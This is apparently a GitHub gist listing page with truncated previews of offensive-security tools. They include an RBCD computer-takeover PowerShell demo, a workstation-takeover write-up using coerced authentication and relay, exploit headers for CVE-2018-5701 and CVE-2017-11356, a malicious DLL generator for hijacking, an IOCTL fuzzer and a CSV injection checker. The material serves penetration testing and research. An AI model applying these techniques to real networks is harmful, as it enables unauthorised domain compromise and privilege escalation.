klezVirus

View GitHub Profile
@klezVirus
klezVirus / rbcd_demo.ps1
Created September 26, 2021 18:47 — forked from HarmJ0y/rbcd_demo.ps1
Resource-based constrained delegation computer DACL takeover demo
# import the necessary toolsets
Import-Module .\powermad.ps1
Import-Module .\powerview.ps1
# we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account
whoami
# the target computer object we're taking over
$TargetComputer = "primary.testlab.local"
@klezVirus
klezVirus / Workstation-Takeover.md
Created September 24, 2021 13:16 — forked from gladiatx0r/Workstation-Takeover.md
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. In short, this is accomplished by:

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

@klezVirus
klezVirus / EtwStartWebClient.cs
Last active May 21, 2024 20:52
A PoC in C# to enable WebClient Programmatically
using System.Runtime.InteropServices;
using System;
/*
* Simple C# PoC to enable WebClient Service Programmatically
* Based on the C++ version from @tiraniddo (James Forshaw)
* Twitter: https://twitter.com/tiraniddo
* URL: https://www.tiraniddo.dev/2015/03/starting-webclient-service.html
*
* Compile with:
@klezVirus
klezVirus / CVE-2018-5701.py
Last active June 1, 2021 20:01
CVE-2018-5701: iolo System Mechanic Pro Local Privilege Escalation
# Exploit title: iolo System Mechanic Pro v. <= 15.5.0.61 - Arbitrary Write Local Privilege Escalation (LPE)
# Exploit Authors: d3adc0de
# CVE: CVE-2018-5701
# Date: 01/06/2021
# Vendor Homepage: https://www.iolo.com/
# Download: https://www.iolo.com/products/system-mechanic-ultimate-defense/
# https://mega.nz/file/xJgz0QYA#zy0ynELGQG8L_VAFKQeTOK3b6hp4dka7QWKWal9Lo6E
# Version: v.15.5.0.61
# Tested on: Windows 10 Pro x64 v.1903 Build 18362.30
# Category: local exploit
@klezVirus
klezVirus / crude_ioctl_fuzzer.py
Last active May 31, 2021 08:16 — forked from uf0o/crude_ioctl_fuzzer.py
A crude IOCTL fuzzer for windows driver testing
import random
import sys
import struct
import io
from ctypes import windll, POINTER, byref
from ctypes.wintypes import LPVOID, DWORD, LPCSTR, LPSTR, BOOL, HANDLE
from enum import Enum
'''
#define IOCTL_HEVD_TYPE_CONFUSION 0x222023
define(["require", "exports"], function (require, exports) {
/**
* Helper to use the Command Line Interface (CLI) easily with both Windows and Unix environments.
* Requires underscore or lodash as global through "_".
*/
var Cli = (function () {
function Cli() {
}
/**
* Execute a CLI command.
@klezVirus
klezVirus / evilldll-gen.sh
Last active March 1, 2024 12:07
Simple Malicious DLL Generator for DLL Hijacking Attacks
#!/bin/sh
usage(){
    echo "# ################# Simple CPP to DLL Utility ################# #"
    echo "# This tool has been made to easily generate and compile a DLL to be used for DLL hijacking.#"
    echo "# #"
    echo "# ========================================================================================== #"
    echo "# #"
    echo "# Usage: #"
    echo "# ./dll-gcc [Options] <input-file> #"
@klezVirus
klezVirus / cve-2017-11356.py
Last active March 15, 2021 11:01
CVE-2017-11356: PEGA Platform Missing Access Control
import requests
import sys
import argparse
import traceback
import pytest
import time
import json
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.by import By
@klezVirus
klezVirus / csvi-check.py
Created March 1, 2021 13:54
Simple CSV Injection Check
import csv
import sys
import os
import argparse
def check(args):
    csv_injection = ["=", "@", "+", "-"]
    end = "\n [-] Finished!"
    novuln = " No Vulnerability found."